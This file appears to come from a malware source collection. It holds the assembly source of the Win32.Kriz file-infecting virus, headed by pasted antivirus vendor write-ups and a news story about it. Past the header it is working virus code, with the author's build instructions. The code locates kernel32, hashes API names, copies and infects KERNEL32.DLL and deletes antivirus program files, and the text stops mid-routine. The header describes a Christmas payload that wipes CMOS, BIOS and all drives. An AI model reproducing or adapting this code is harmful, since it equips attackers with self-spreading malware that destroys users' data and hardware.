MalwareSourceCode/Win32/Infector/Win32.Kriz.asm
2020-10-16 23:26:21 +02:00

2805 lines
75 KiB
NASM

; Fucked up descriptions:
; SYMANTEC
; ---------------------------------------------------------------------------
; W32.KRIZ
;
; Aliases: W32.Kriz.3863, W32.Kriz.3740
; Area of Infection: Windows 9x/NT PE files
; Likelihood: Rare
; Region Reported: Worldwide
; Characteristics: Wild, BIOS, December 25
;
;
; Description:
; W32.Kriz is a Windows 9x/NT virus, which infects Portable Executable (PE)
; Windows files. The virus goes resident into memory, attempting to infect
; any files that are opened by the user or applications. If infected with
; this virus, the user should verify they have "booted clean" before
; attempting to scan and repair files.
;
; The virus also modifies the KERNEL32.DLL. This file must be replaced with
; a known, clean backup. In addition, this virus may corrupt some PE files,
; requiring them to be replaced by known, clean backups (or from the
; installation package).
;
; The W32.Kriz virus also contains a payload, which is executed on December
; 25th.
;
; The first time the virus is executed on a system, it will create an
; infected copy of KERNEL32.DLL in the Windows system directory. The file
; will be named KRIZED.TT6. If this file is found in the Windows system
; directory, it should be deleted. The next time Windows is started, this
; file will be copied over the original KERNEL32.DLL. Then, the virus infects
; other files when certain Windows API functions are called by a program.
;
; There are variants of this virus. Some of the differences between variants
; pertain to the payload. The 3863 variant will access more types of drives
; when overwriting files. Other differences include the method of infection.
; The 3740 variant will create a new section named "…" and copy its viral
; code to that newly created section. The 3863 variant will simply append its
; code to the end of the last section.
;
; Currently, only the 3863 variant has been found in the wild. There is a
; 3863.b version of this virus. It is the same as the 3863 variant except
; that some of the unused text at the end of the virus has been corrupted.
;
; Payload:
; If the system date is December 25th, the virus will attempt to flash the
; BIOS of the computer. This will prevent the computer from booting up
; properly and may require a change of hardware. Information stored in the
; CMOS will be cleared. So the date, time, hard drive and floppy drive
; settings, peripheral configuration, etc. will need to be restored. The
; virus will also begin overwriting files on all available drives. This
; includes mapped network drives, floppy drives and RAM disks. This payload
; is very similar to W95.CIH.
;
;
; Write-up by: Eric Chien
; September 1, 1999
; AVP
; ---------------------------------------------------------------------------
; WIN32.KRIZ
;
; It is a memory resident polymorphic Windows virus. It replicates under
; Windows32 systems and infects PE EXE files (Windows executable) with EXE
; and SCR filename extensions, as well as the Windows KERNEL32.DLL system
; library that allows the virus to stay memory resident during a whole
; Windows session. The virus in infected KERNEL32.DLL hooks files access
; functions, intercepts file copying, opening, moving, e.t.c. and infects
; files that are accessed. The virus checks file names and does not infect
; several anti-virus program files:
;
; _AVP32.EXE, _AVPM.EXE, ALERTSVC.EXE, AMON.EXE, AVP32.EXE, AVPM.EXE,
; N32SCANW.EXE, NAVAPSVC.EXE, NAVAPW32.EXE, NAVLU32.EXE, NAVRUNR.EXE,
; NAVWNT.EXE, NOD32.EXE, NPSSVC.EXE, NSCHEDNT.EXE, NSPLUGIN.EXE,
; SCAN.EXE, SMSS.EXE
;
; The virus has an extremely dangerous payload that is activated on December
; 25th. On this day when infecting any file (i.e. when they are accessed by
; any of the Windows functions listed below), the virus "kills" information
; stored in CMOS memory, overwrites data in all files on all available
; drives, and then messes-up the Flash BIOS by using the same routine that
; was found in the "Win95.CIH" virus (aka Chernobyl).
;
; When an infected file is run, the virus' polymorphic decryption loop takes
; control and restores the virus code back to its original form. The virus
; then scans the Windows32 kernel, gets addresses of necessary Windows
; functions and calls the KERNEL32 infection routine.
;
; While infecting a file the virus creates a new file section at the end of
; the file, encrypts and writes its code to there. To separate infected and
; not yet infected files the virus writes the "666" ID string to the PE file
; header reserved field. The virus section has the "..." name.
;
; While infecting the KERNEL32.DLL module the virus also patches its Export
; table (exported functions) and modifies several functions' addresses so,
; that on next Windows startup the calls to KERNEL32 function will be
; filtered by virus hookers. That allows the virus to monitor file access
; calls.
;
; The virus hooks 16 KERNEL32 functions - file opening, copying, deleting,
; reading/writing file attributes, creating a new process. The complete list
; of hooked functions looks as follows:
;
; CopyFileA CopyFileW
; CreateFileA CreateFileW
; DeleteFileA DeleteFileW
; MoveFileA MoveFileExA MoveFileW MoveFileExW
; GetFileAttributesA SetFileAttributesW
; SetFileAttributesA SetFileAttributesExA
; CreateProcessA CreateProcessW
;
; To infect the KERNEL32.DLL file that can be opened in read-only more only,
; the virus uses a standard trick. It copies this file with temporary name
; (this copy has KRIZED.TT6 name and it is created in the Windows system
; directory), infects it and writes "rename" instruction to the WININIT.INI
; file. This trick allows the virus to infect the copy of KERNEL32.DLL and
; force Windows to replace the original KERNEL32.DLL with infected copy on
; next startup.
;
; The virus contains internal text strings that are not used in any way:
;
; =( [c] 1999 [t] )=
;
; YOU CALL IT RELIGION, YOU'RE FULL OF SHIT
; YOU NEVER KNEW, YOU NEVER DID, YOU NEVER WILL
; YOU'RE SO FULL OF SHIT, I DON'T WANT TO HEAR IT
; ALL YOU DO IS TALK ABOUT YOURSELF
; I DON'T WANNA HEAR IT, COZ I KNOW NONE OF IT'S TRUE
; I'M SICK AND TIRED OF ALL YOUR GODDAMN LIES
; LIES IN THE NAME OF GOD
; WHEN ARE YOU GOING TO REALIZE THAT I DON'T WANT TO HEAR IT?!
; I KNOW YOU'RE SO FULL OF SHIT, SO SHUT YOUR FUCKING MOUTH
; YOU KEEP ON TALKING, TALKING EVERYDAY
; FIRST YOU'RE TELLING STORIES, THEN YOU'RE TELLING LIES
; WHEN THE FUCK ARE YOU GOING TO REALIZE THAT I DON'T WANT TO HEAR IT!!
; AH, SHUT THE FUCK UP...
;
; KRIZ.3862
;
; This virus version is very closely related to the original one and differs
; only by additional programming tricks, another "copyright" text string:
;
; (c) T2 & Immortal Riot
;
; and an improved disk erasing routine: in addition to erasing CMOS, Flash
; and files on logical drives this virus enumerates all available network
; drives and erases all files on them. While erasing files the virus
; truncates them and overwrites them with the "DEAD BEEF" hexadecimal string
; (DEADBEEFh).
;
; KRIZ.4029
;
; This virus version is very closely related to the previous one
; ("Kriz.3836"). The differences are: some routines were improved; the
; destruction routine is also activated if the SoftIce debugger is installed
; in the system; the "copyright" text was also changed:
;
; T-2000 / Immortal Riot
;
; Text added: June-30-1999
; New variant Win32.Kriz.3862: August-18-1999
; More information about Kriz.3862 added: August-23-1999
; Kriz.4029 desc. added: September-05-1999
; PANDA
; ---------------------------------------------------------------------------
; CMOS AND FLASH MEMORIES: PRIME OBJECTIVES OF WIN32.KRIZ
;
; Panda detects and eliminates this virus, and it is the only developer
; capable of disinfecting the Kernel32.DLL library file.
;
; SAN FRANCISCO, August, 27th, 1999 -- Win32.Kriz is a resident polymorphic
; virus that runs under all Win32 platforms (Windows 95, Windows 98 and
; Windows NT) and infects Windows executable files (EXE extensions), screen
; saver files (SCR extensions) and the KERNEL32.DLL system library. Although
; its polymorphic generation routine is quite simple, the virus hides several
; programming tricks up its sleeve to complicate its debugging.
;
; Win32.Kriz's destructive payload is produced on the 25th of December. If,
; on that day, more than 256 infected EXE or SCR files have been accessed,
; the virus deletes the CMOS memory (which contains, among other information,
; data concerning the date, time, type of hard disk, etc.), damages the FLASH
; memory and overwrites all files contained in any network drive.
;
; The first time a file infected by Win32.Kriz is executed in a clean system,
; the polymorphic routines takes over and decrypts the remaining virus code
; in order to subsequently scan the resident area of KERNEL32 to locate the
; addresses of the following API's:
;
; CopyFileA, CreateFileA, CreateProcessA, DeleteFileA, GetFileAttributesA,
; MoveFileA, MoveFileExA, SetFileAttributesA, CopyFileW, CreateFileW,
; CreateProcessW, DeleteFileW, GetFileAttributesW, MoveFileW, MoveFileExW,
; SetFileAttributesW, CloseHandle, CreateFileMappingA, FindClose,
; FindFirstFileA, FindNextFileA, FreeLibrary, GetCurrentDirectory,
; GetDriveTypeA, GetFileSize, GetLocalTime, GetLogicalDriveStringsA,
; GetProcAddress, GetSystemDirectoryA, GetTickCount, GetWindowsDirectory,
; GlobalAlloc, GlobalFree, LoadLibraryA, MapViewOfFile, SetCurrentDirectory,
; SetFileTime, UnmapViewOfFile, WriteFile, WritePrivateProfile.
;
; The virus calculates the CRC16 of the name of the APIs that the KERNEL32
; exports and compares them with the list of the ones it needs to
; subsequently infect the KERNEL32.DLL file. It then overwrites the position
; of these APIs with the corresponding addresses of the viral routines.
;
; Win32.Kriz copies the KERNEL32.DLL file (from the c:\windows\system
; directory), renames it as KRIZED.TT6 and infects it, calculating the file's
; checksum correctly so that it does not generate any execution problems
; under Windows NT. Once the KRIZED.TT6 temp file has been infected, the
; virus creates a WININIT.INI file that automatically replaces the original
; KERNEL32.DLL file with the new infected copy. This way, upon the next
; system startup, Win32.Kriz will remain resident throughout the entire
; session, even if no other infected file is executed. In the first session,
; the virus is not resident in memory and will not infect any files as long
; as the system is not restarted. Then, when the system is booted with an
; infected copy of the KERNEL32.DLL file, Win32.Kriz will attack any file
; that is accessed (upon copying, moving, running, creating or attribute
; modification) after the APIs that were intercepted are called.
;
; Win32.Kriz contains the following text:
;
; (c) T2 & Immortal Riot
;
; YOU CALL IT RELIGION, YOU'RE FULL OF SHIT
; YOU NEVER KNEW, YOU NEVER DID, YOU NEVER WILL
; YOU'RE SO FULL OF SHIT, I DON'T WANT TO HEAR IT
; ALL YOU DO IS TALK ABOUT YOURSELF
; I DON'T WANNA HEAR IT, COZ I KNOW NONE OF IT'S TRUE
; I'M SICK AND TIRED OF ALL YOUR GODDAMN LIES
; LIES IN THE NAME OF GOD
; WHEN ARE YOU GOING TO REALIZE THAT I DON'T WANT TO HEAR IT?!
; I KNOW YOU'RE SO FULL OF SHIT, SO SHUT YOUR FUCKING MOUTH
; YOU KEEP ON TALKING, TALKING EVERYDAY
; FIRST YOU'RE TELLING STORIES, THEN YOU'RE TELLING LIES
; WHEN THE FUCK ARE YOU GOING TO REALIZE THAT I DON'T WANT TO HEAR IT!!
; AH, SHUT THE FUCK UP...
;
; Panda detects and eliminates Win32.Kriz, thereby protecting users against
; this virus, which is a harmful threat to their systems. In addition, Panda
; is the only antivirus developer capable of disinfecting the Kernel32.DLL
; library file. For this, the computer must be booted in MS-DOS mode, since
; the affected files are used by Windows upon computer startup.
; NAI
; ---------------------------------------------------------------------------
; VIRUS NAME
; W32/Kriz.3862
;
; DATE ADDED
; 8/16/99
;
; VIRUS CHARACTERISTICS
; This is Windows 95/98 and NT virus that infects PE EXE files. It is also
; polymorphic. When an infected file is executed, this virus will stay
; resident in memory until the next time the system is rebooted. This virus
; encrypts its code, leaving only a small random decryptor. This virus will
; infect files as they are opened by any application while it is in memory.
; This will occur when a user scans files as well.
;
; The virus also has a payload which activates when an infected file is run
; on December 25th. When it does it will attempt To erase the computer's CMOS
; information, which contains information such as date and time, and the type
; of hard disk the computer uses. This virus will also attempt to directly
; erase disk sectors. It will attempt to flash the BIOS with garbage. This
; only works on certain types of BIOSes. If this succeeds, the computer will
; not boot. This is similar to the action taken by the CIH virus. If the
; virus is successful the computer will not boot up, not even from a floppy
; disk. In some cases the virus will corrupt the file it infects and cleaning
; may not be possible.
;
; This virus will infect kernel32.dll. When it does, it replaces the original
; contents with it owns. Because of this the file can NOT be repaired, it
; must be replaced.
;
; This virus code also contains a poem that contains quite a bit of
; profanity. It is never displayed, nor is it used in any of the routines
; it runs.
;
; INDICATIONS OF INFECTION
; Not Available...
;
; METHOD OF INFECTION
; When first run on a clean machine, the virus checks KERNEL32.DLL to see if
; it is infected, if yes then the virus exits. If KERNEL32.DLL is not
; infected then the virus copies KERNEL32.DLL to WINDOWS\SYSTEM\KRIZED.TT6
; and then the virus infects this local copy. The virus then creates the file
; WINDOWS\WININIT.INI containing the lines :-
;
; [rename]
; C:\WINDOWS\SYSTEM\KERNEL32.DLL=C:\WINDOWS\SYSTEM\KRIZED.TT6
;
; This causes windows to replace KERNEL32.DLL with the infected copy when the
; system is next re-started. In the infected copy of KERNEL32.DLL the virus
; hooks the following functions :-
;
; CopyFileA
; CopyFileW
; CreateFileA
; CreateFileW
; CreateProcessA
; CreateProcessW
; DeleteFileA
; DeleteFileW
; GetFileAttributesA
; GetFileAttributesW
; MoveFileA
; MoveFileW
; MoveFileExA
; MoveFileExW
; SetFileAttributesA
; SetFileAttributesW
;
; This causes any PE executable file that is run, copied, moved or scanned to
; be infected by the virus.
;
; VIRUS INFORMATION
; DISCOVERY DATE: 8/16/99
; TYPE: Win32
; RISK ASSESSMENT: medium-AvertWatch List
; MINIMUM DAT: 4039
;
; VARIANTS
; Unknown
;
; ALIASES
; Kriz
; ZDNN (some PC news site)
; ---------------------------------------------------------------------------
; 'CHRISTMAS' VIRUS CAN DESTROY PCs
;
; New virus set to hit Dec. 25, delivering a payload that can kill a Windows
; PC's BIOS. Is it as bad as CIH?
;
; By Bob Sullivan, MSNBC
; August 18, 1999 3:00 PM PT
;
; A nasty new virus discovered by researchers promises to do even more damage
; to victims than the Chernobyl virus. It has the ability not only to erase
; files, but also to render a PC useless by destroying its flash BIOS.
;
; The good news is it won't execute until Dec. 25; the bad news is PC users
; without anti-virus programs may have a very bad Christmas Day.
;
; The author of Win32.Kriz, discovered recently by researchers, sounds as if
; he or she has an ax to grind against religious folks.
;
; Inside the virus is a text string with a poem full of expletives
; criticizing those who preach religion: "I don't wanna hear it, coz I know
; none of it's true," the author writes, according to anti-virus research
; firm Kaspersky Lab.
;
; Victims of the virus -- who can be anyone using Windows 95, Windows 98 or
; Windows NT -- can expect a load of trouble. The virus kills the CMOS
; memory, overwrites data in all files on all available drives, and then
; destroys the flash BIOS by using the same routine that was found in the
; "Win95_CIH" virus, also known as Chernobyl.
;
; "This is a nasty one, very well written," said Dan Takata of anti-virus
; vendor Data Fellows Inc.
;
; He said it's too early to tell if the virus will be widespread -- but
; potential victims have until Dec. 25 to update their antivirus programs
; against it.
; AVP PRESS
; ---------------------------------------------------------------------------
; New Windows Virus Named Win32.Kriz.3740 Discovered
;
; Attacks Executable and Screen Saver Files
;
; Medina, OH August 18, 1999 -- Central Command and Kaspersky Lab announce
; the discovery of a new Windows virus that contains same destructive payload
; as the Chernobyl virus that rendered thousands of computers in Asia
; unusable.
;
; Named Win32.Kriz.3740, the virus contains even more deadly capacity than
; the original Chernobyl virus. The Win32.Kriz.3740 virus, on December 25th,
; erases the CMOS memory, overwrites data in all files on all available
; drives, and then destroys the Flash BIOS by using the same routine that was
; found in the Win95.CIH virus (aka Chernobyl virus).
;
; Win32.Kriz.3740 is a memory resident, polymorphic, Windows virus. It
; replicates under Windows 95, Windows 98, and Windows NT systems and infects
; Windows programs with EXE (executable) and SCR (screen savers) filename
; extensions, as well as Windows KERNEL32.DLL system library that allows the
; virus to stay memory resident during the entire Windows session.
; SOPHOS
; ---------------------------------------------------------------------------
; VIRUS NAME: W32/Kriz.
; ALIASES: Kriz, W32.Kriz.3740, Win32.Kriz.
; TYPE: PE executable virus.
; RESIDENT: Yes.
; STEALTH: No.
; DESCRIPTION: This virus, which works under Windows 95/98 and Windows NT,
; infects PE (Portable Executable) files with .EXE or .SCR
; extensions. It also infects KERNEL32.DLL.
;
; W32/Kriz has a particularly destructive payload. On December
; 25th it will erase the CMOS setup, attempt to corrupt the
; system BIOS (in a similar way to W95/CIH-10xx) and attempt to
; overwrite all files on all local hard disks and network drives
; with garbage.
;
; If the system BIOS corruption is successful you will no longer
; be able to use your computer, and the BIOS chip may need to be
; replaced.
;
; There are two known variants of this virus, but only one of
; these is known to be in the wild.
; Note, all bugs mentioned in the articles above have been fixed.
; Source:
;============================================================================
;
;
; NAME: Win32.Krized v1.666
; TYPE: Parasitic resident polymorphic K32/PE-infector.
; OS: Windoze 95/98/NT/2000.
; CPU: 386+
; SIZE: Around 4k.
; AUTHOR: T-2000 / Immortal Riot.
; E-MAIL: T2000_@hotmail.com
; DATE: April 1999 - August 1999.
; PAYLOAD: Judgement Day on X-mas.
;
;
; FEATURES:
;
; - Completely Win32-compatible.
; - Achieves global Win32-residency by kernel-infection.
; - Polymorphic encrypted in files (PE/K32).
; - Traps possible errors with SEH's.
; - Anti-debugger/disassembler/emulator code.
; - Calculates correct image-checksum when needed.
; - Kills various AV-programs.
; - Win9x-payload: ring-0 CMOS & BIOS-trashing.
; - Win32-payload: local & network drive-trashing.
;
;
; Succesfully tested under Windoze 95, 98, NT 4.0, and 2000 beta 3.
;
; Creds go to Johnny Panic for the CRC-routines, to CIH for the
; BIOS-nuker, and to Rude Boy for the image-checksum algorithm.
;
; Assemble with: TASM32 KRIZED.ASM /ml /m
; TLINK32 KRIZED.OBJ IMPORT32.LIB
;
; Greets to Metal Militia, The Unforgiven, Johnny Panic, Bad Spirit,
; Godlike, Retch, The Lich, LovinGod, Vendigo, Morphine, and Lord Julus.
;
;============================================================================
ORG 0
.386p
.MODEL FLAT
; Stuff our code in the data-section, which is already
; readable/writeable, so we don't have to manually set
; the write-bit to the code-section anymore.
.DATA
; Some exports, only used by the carrier.
EXTRN ExitProcess:PROC
EXTRN GetFileAttributesA:PROC
EXTRN MessageBoxA:PROC
; *** Various equates we use. ***
GENERIC_READ EQU 80000000h
GENERIC_WRITE EQU 40000000h
OPEN_EXISTING EQU 00000003h
FILE_ATTRIBUTE_NORMAL EQU 00000080h
PAGE_READONLY EQU 00000002h
PAGE_READWRITE EQU 00000004h
FILE_MAP_READ EQU 00000004h
FILE_MAP_WRITE EQU 00000002h
EWX_REBOOT EQU 00000002h
EWX_FORCE EQU 00000004h
MOVEFILE_REPLACE_EXISTING EQU 00000001h
MOVEFILE_DELAY_UNTIL_REBOOT EQU 00000004h
ERROR_ACCESS_DENIED EQU 00000005h
RESOURCE_CONNECTED EQU 00000001h
RESOURCETYPE_DISK EQU 00000001h
DRIVE_REMOVABLE EQU 00000002h
DRIVE_CDROM EQU 00000005h
DRIVE_RAMDISK EQU 00000006h
Virus_Size EQU (Virus_End-START)
Poly_Size EQU 200 ; Maximum size of generated
; polymorphic decryptors.
Work_API_Count EQU (End_Work_API_CRC-Work_API_CRC) / 2
Hook_API_Count EQU (Work_API_CRC-Hook_API_CRC) / 2
Kill_CRC_Count EQU (End_Kill_Table-Kill_Table) / 2
; Equates used to index the API address table.
ixCopyFileA EQU 00
ixCreateFileA EQU 01
ixCreateProcessA EQU 02
ixDeleteFileA EQU 03
ixGetFileAttributesA EQU 04
ixMoveFileA EQU 05
ixMoveFileExA EQU 06
ixSetFileAttributesA EQU 07
ixCopyFileW EQU 08
ixCreateFileW EQU 09
ixCreateProcessW EQU 10
ixDeleteFileW EQU 11
ixGetFileAttributesW EQU 12
ixMoveFileW EQU 13
ixMoveFileExW EQU 14
ixSetFileAttributesW EQU 15
ixCloseHandle EQU 16
ixCreateFileMappingA EQU 17
ixFindClose EQU 18
ixFindFirstFileA EQU 19
ixFindNextFileA EQU 20
ixGetCurrentDirectoryA EQU 21
ixGetDriveTypeA EQU 22
ixGetFileSize EQU 23
ixGetFileTime EQU 24
ixGetLastError EQU 25
ixGetLocalTime EQU 26
ixGetLogicalDriveStringsA EQU 27
ixGetProcAddress EQU 28
ixGetSystemDirectoryA EQU 29
ixGetTickCount EQU 30
ixGetWindowsDirectoryA EQU 31
ixGlobalAlloc EQU 32
ixGlobalFree EQU 33
ixLoadLibraryA EQU 34
ixMapViewOfFile EQU 35
ixSetCurrentDirectoryA EQU 36
ixSetFileTime EQU 37
ixUnmapViewOfFile EQU 38
ixWriteFile EQU 39
ixWritePrivateProfileStringA EQU 40
CRC16 MACRO String
CRC_Reg = 0FFFFFFFFh
IRPC _x, <String>
Ctrl_Byte = ('&_x&' XOR (CRC_Reg AND 0FFh))
CRC_Reg = (CRC_Reg SHR 8)
REPT 8
Ctrl_Byte = (Ctrl_Byte SHR 1) XOR (0EDB88320h * (Ctrl_Byte AND 1))
ENDM
CRC_Reg = (CRC_Reg XOR Ctrl_Byte)
ENDM
DW (CRC_Reg AND 0FFFFh)
ENDM
; === VIRUSCODE STARTS HERE ===
START:
CALL Get_Delta
XOR EDX, EDX ; Zero EDX.
JNZ $+31337 ; Simple anti-heuristic.
; Zero the key of the decryptor, so the
; code won't be fucked-up the next time
; DLLMain get's called.
MOV [EBP+(Stupid_Dummy-START)], DL
Patch_Decrypt = DWORD PTR $-4
MOV EAX, EBP
SUB EAX, 1000h ; Calculate our base-address.
Virus_RVA = DWORD PTR $-4
; Calculate VA of our host.
ADD EAX, (1000h+(Carrier-START))
Host_EIP = DWORD PTR $-4
MOV [ESP+(9*4)], EAX ; Patch return-address with
; original entrypoint.
JMP CALL_Setup_SEH ; Abort further processing?
Init_Mode = BYTE PTR $-1
JMP Return_To_Host
CALL_Setup_SEH: CALL Setup_Load_SEH ; Bump SEH-address on stack.
MOV ESP, [ESP+(2*4)] ; Restore original ESP.
JMP_R_Init_SEH: JMP Rest_Init_SEH ; And end further processing.
Author DB 'T-2000 / Immortal Riot', 0
Setup_Load_SEH: PUSH DWORD PTR FS:[EDX] ; Bump original SEH on stack.
MOV FS:[EDX], ESP ; Stuff our own SEH-address.
MOV EAX, [ESP+(12*4)] ; Get pointer to last SEH.
XOR AX, AX ; Align on a 64k boundary.
Find_K32_Base: CMP EAX, 400000h ; Below application-memory?
JB JMP_R_Init_SEH
CMP [EAX.MZ_Mark], 'ZM' ; Found the kernel?
JNE Loop_Find_K32
CMP [EAX.MZ_Reloc_Table], 40h ; K32 has a PE-header.
JB Loop_Find_K32
MOV EBX, [EAX+3Ch] ; RVA of PE-header.
ADD EBX, EAX ; Plus base, (make it a VA).
CMP [EBX.PE_Mark], 'EP' ; Verify PE-header, just in
JNE Loop_Find_K32 ; case.
; Verify it's a DLL we've found.
TEST BYTE PTR [EBX.PE_Flags+1], 00100000b
JNZ Found_K32_Base
Loop_Find_K32: SUB EAX, 65536 ; Scan downwards, stuff
; always gets loaded at
; a 64k boundary.
JMP Find_K32_Base ; Just repeat the loop.
Found_K32_Base: MOV [EBP+(K32_Base-START)], EAX ; Store K32-base.
PUSH [EBX.Image_Size]
POP DWORD PTR [EBP+(K32_Image_Size-START)]
MOV EBX, [EBX+120] ; K32's export-table.
ADD EBX, EAX
MOV EDI, [EBX+(8*4)] ; Array of API-name RVA's.
ADD EDI, EAX
MOV ECX, [EBX+(6*4)] ; Amount of API-name RVA's.
MOV BYTE PTR [EBP+(Fetched_API-START)], (Hook_API_Count + Work_API_Count)
Loop_Export: MOV ESI, [EDI+(EDX*4)] ; Offset of API-name.
ADD ESI, EAX
PUSHAD
XCHG ECX, EAX ; Save base-address in ECX.
CALL Calculate_CRC16 ; Calculate the CRC16 of this
; API-name.
MOV ESI, [EBX+(9*4)] ; Array of API-ordinals.
ADD ESI, ECX
MOV EBX, [EBX+(7*4)] ; Array of API-handler RVA's.
PUSH EAX
MOVZX EAX, WORD PTR [ESI+(EDX*2)]
LEA ESI, [EBX+(EAX*4)]
POP EAX
MOV EBX, [ECX+ESI]
; NAV 9x seems to fuck around with the K32 memory image setting it's own
; export hooks, for example CreateProcessA and WinExec. Anyways, Krized
; would use hardcoded hooked addresses, and the next boot everything goes
; bang cuz NAV ain't loaded yet. To test for hooked addresses we check if
; the address is in range of the K32-image, and abort infect if it's not.
CMP EBX, 12345678h
K32_Image_Size = DWORD PTR $-4
JNB Rep_Loop_Name
; Check if it's an API which we need.
LEA EDI, [EBP+(Hook_API_CRC-START)]
PUSH (Hook_API_Count+Work_API_Count)
POP ECX
PUSH ECX
REPNE SCASW
POP EAX
JNE Rep_Loop_Name
SUB EAX, ECX
; Save API-address.
MOV [EBP+(API_Addresses-START)+(EAX*4)-4], EBX
; Got another one.
DEC BYTE PTR [EBP+(Fetched_API-START)]
CMP AL, Hook_API_Count+1 ; Do we need to save this
JNB Rep_Loop_Name ; API's export-address?
MOV [EBP+(Hook_Exports-START)+(EAX*4)-4], ESI
Rep_Loop_Name: POPAD
INC EDX
LOOP Loop_Export
JECXZ @1
DB 0E9h
@1: CMP AL, 0 ; We're all API's found?
Fetched_API = BYTE PTR $-1
JNZ Wipe_Memory ; Else abort further infect.
PUSH 0FFFFFFFFh ; Request for kernel-infect.
POP ESI
CALL Infect_File
; Try to cover-up as many tracks as possible by clearing
; most of our code in memory, as we don't need it anymore.
Wipe_Memory: MOV EDI, EBP
MOV CX, (Wipe_Memory-START)
CLD
REP STOSB
ADD EDI, (Infect_File-Wipe_Memory)
MOV CX, (Virus_End-Infect_File)
REP STOSB
MOV ECX, 0 ; Should we perform a reboot?
ExitWindowsEx = DWORD PTR $-4
JECXZ Rest_Init_SEH
PUSH EWX_FORCE OR EWX_REBOOT ; Force a system reboot.
PUSH 0
CALL ECX
Rest_Init_SEH: XOR EAX, EAX
POP DWORD PTR FS:[EAX] ; Unhook our own SEH.
POP EAX
Return_To_Host: POPAD ; Restore all registers.
POPFD
RET ; Return to our host.
;-------------------------------------------------
; ESI == 0FFFFFFFFh = Infect kernel.
; ESI != 0FFFFFFFFh = Infect file pointed by ESI.
;-------------------------------------------------
Infect_File:
PUSHAD
XOR EBX, EBX
CALL Setup_Inf_SEH
PUSHAD
MOV ESI, [ESP+(9*4)] ; Grab exception-code off
LODSD ; the stack.
CALL Get_Delta
SHL EAX, 4 ; Strip flags.
CMP EAX, (03h SHL 4) ; Virus' request to call an
JE Virus_Request ; API ?
MOV ESP, [ESP+(10*4)] ; Unhandled exception, so
; abort further execution.
JMP_R_Inf_SEH: JMP Rest_Inf_SEH
Virus_Request: MOV EDX, [ESP+(11*4)] ; Context-block.
LEA EAX, [EBP+(Perform_API-START)]
XCHG [EDX+184], EAX ; Swap EIP.
MOV ECX, [EDX+196] ; ESP.
; Win9x sets the exception-address with Exception_EIP + 1, whereas NT
; does the right thing and uses Exception_EIP, we need some extra
; code to keep this in account.
CMP BYTE PTR [EAX], 0CCh ; This is the breakpoint?
JNE Swap_Address
INC EAX ; Skip breakpoint.
Swap_Address: XCHG [ECX], EAX ; Swap index-number with
; Perform_API's address.
MOV [EBP+(Work_API_Index-START)], AL
POPAD
XOR EAX, EAX ; Reload context and continue
; execution.
RET
Setup_Inf_SEH: PUSH DWORD PTR FS:[EBX]
MOV FS:[EBX], ESP
; The virtual-size entry of object-headers is not reliable,
; therefore we need to allocate our memory by hand.
PUSH (End_Heap-Virus_End) ; Allocate memory on the
PUSH EBX ; global heap.
PUSH ixGlobalAlloc
INT 03h
XCHG ECX, EAX ; Error?
JECXZ JMP_R_Inf_SEH
MOV [EBP+(Global_Handle-START)], ECX
MOV [EBP+(Infect_Mode-START)], BL
INC ESI ; Request to infect K32 ?
JZ Payload_Test
DEC ESI ; Some API can have NULL.
JZ JMP_Free_Glo_M
MOV BYTE PTR [EBP+(Infect_Mode-START)], (Open_Candidate-Infect_Mode) - 1
XCHG EBX, EAX ; Zero EAX.
LEA EBX, [ECX+(ANSI_Target_File-Virus_End)]
MOV EDI, EBX
MOV ECX, 260
CLD
Convert_Path: LODSB ; Fetch next byte/word.
NOP
Unicode_Switch = WORD PTR $-2
OR AH, AH ; Is it non-ASCII ?
JNZ JMP_Free_Glo_M ; Then abort infect.
CMP AL, 'a'
JB Store_Upcase
CMP AL, 'z'
JA Store_Upcase
SUB AL, 'a' - 'A' ; Convert to uppercase.
Store_Upcase: STOSB
OR AL, AL
JZ Init_Find_Name
LOOP Convert_Path
JMP_Free_Glo_M: JMP Free_Global_M
Init_Find_Name: MOV ESI, EDI
Find_File_Name: DEC ESI
CMP ESI, EBX ; Reached the beginning?
JE Check_File_Ext
CMP BYTE PTR [ESI-1], '\' ; Found start filename?
JNE Find_File_Name
Check_File_Ext: CMP [EDI-5], 'EXE.' ; Standard .EXE-file?
JE Calc_CRC_Name
CMP [EDI-5], 'RCS.' ; Perhaps a screen-saver?
JNE JMP_Free_Glo_M
Calc_CRC_Name: CALL Calculate_CRC16 ; Calculate filename's CRC.
; Kill AV-files.
LEA EDI, [EBP+(Kill_Table-START)]
PUSH Kill_CRC_Count
POP ECX
REPNE SCASW
JNE Payload_Test
PUSH FILE_ATTRIBUTE_NORMAL ; Prevent any Happy99 alike
PUSH EBX ; 'protection'.
PUSH ixSetFileAttributesA
INT 03h
PUSH EBX ; Later dude..
PUSH ixDeleteFileA
INT 03h
Payload_Test: CALL Check_For_Payload ; Activate?
MOV BYTE PTR [EBP+(Clear_Tracks_Sw-START)], (Free_Global_M-Clear_Tracks_Sw) - 1
JMP $
Infect_Mode = BYTE PTR $-1
MOV EBX, [EBP+(Global_Handle-START)]
; Obtain the path to the Windoze system-directory,
; which is most likely C:\WINDOWS\SYSTEM.
PUSH 260
LEA ESI, [EBX+(Clean_K32_Path-Virus_End)]
PUSH ESI
PUSH ixGetSystemDirectoryA
INT 03h
LEA EDI, [EBX+(Infected_K32_Path-Virus_End)]
MOV [EBP+(Offset_Inf_K32-START)], EDI
PUSH EDI
XCHG ECX, EAX
CLD
REP MOVSB
PUSH ESI
; Append the temporary virus filename to the
; system-path, ie. C:\WINDOWS\SYSTEM\KRIZED.TT6.
LEA ESI, [EBP+(Infected_K32-START)]
MOVSD
MOVSD
MOVSD
; Append the original kernel filename to the
; system-path, ie. C:\WINDOWS\SYSTEM\KERNEL32.DLL.
POP EDI
LEA ESI, [EBP+(KERNEL32_Name-START)]
MOV CL, 14
REP MOVSB
; In the system-dir, copy KERNEL32.DLL to KRIZED.TT6.
PUSH 1
LEA EAX, [EBX+(Infected_K32_Path-Virus_End)]
PUSH EAX
LEA EAX, [EBX+(Clean_K32_Path-Virus_End)]
PUSH EAX
PUSH ixCopyFileA
INT 03h
POP EBX
DEC EAX ; Any problems doing it?
JNZ Free_Global_M
MOV [EBP+(Clear_Tracks_Sw-START)], AL
Open_Candidate: XOR ESI, ESI
JNZ $-27
PUSH EBX ; Umm.. get it's attribs?
PUSH ixGetFileAttributesA
INT 03h
INC EAX ; Ack, error.
JZ Clear_Tracks
DEC EAX ; Restore return value.
PUSH EAX
PUSH EBX
AND AL, NOT 00000001b ; Readonly my ass..
PUSH EAX ; Strip readonly-flag.
PUSH EBX
PUSH ixSetFileAttributesA
INT 03h
OR EAX, EAX ; Test for error.
